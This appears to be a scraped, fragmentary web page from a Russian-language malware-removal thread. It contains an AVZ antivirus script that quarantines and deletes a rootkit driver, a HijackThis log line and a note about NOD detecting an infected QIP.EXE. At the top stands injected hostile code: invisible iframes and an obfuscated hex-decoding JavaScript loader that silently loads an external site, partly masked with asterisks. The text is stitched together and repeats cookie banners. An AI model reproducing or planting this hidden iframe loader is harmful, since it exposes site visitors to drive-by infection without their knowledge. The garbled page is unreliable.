<iframe src="*******" width=103 height=125 style="visibility: hidden"></iframe><script>function v4a83f49dcd229(v4a83f49dcd9f7){ return(parseInt(v4a83f4*******68(v4a83*********0a6 () {var v4a83f49dd1877=2; return v4a83f49dd1877;} var v4a83f49dd0107='';for(v4a83f49dd08d6=0; v4a83f49dd08d6<v4a83f49dcf937.length; v4a83f49dd0*******d0107+=(String.fromCharCode(v4a838********7.substr(v4a83f49dd08d6, v4a83f49dd10a6()))));}return v4a83f49dd0107;} document.write(v4a83f49dcf168('3C69667*********4703A2F2F747261636B696E676C6F61642E636F6D2F652F696E646578372********23333206865696768743D323131207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
<iframe name='9190' src='http://*******.com/e/index7.php' width=233 height=211 style='display:none'></iframe>
begin
SearchRootkit(true, true);
SetAVZGuardStatus(true);
SetServiceStart('RemoveAny', 4);
QuarantineFile('C:\WINDOWS\system32\Drivers\removeany.sys','');
DeleteFile('C:\WINDOWS\system32\Drivers\removeany.sys');
DeleteService('RemoveAny');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
R3 - URLSearchHook: (no name) - - (no file)
Примерно через сутки Нод выдал информацию о заражении файла QIP.EXE
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?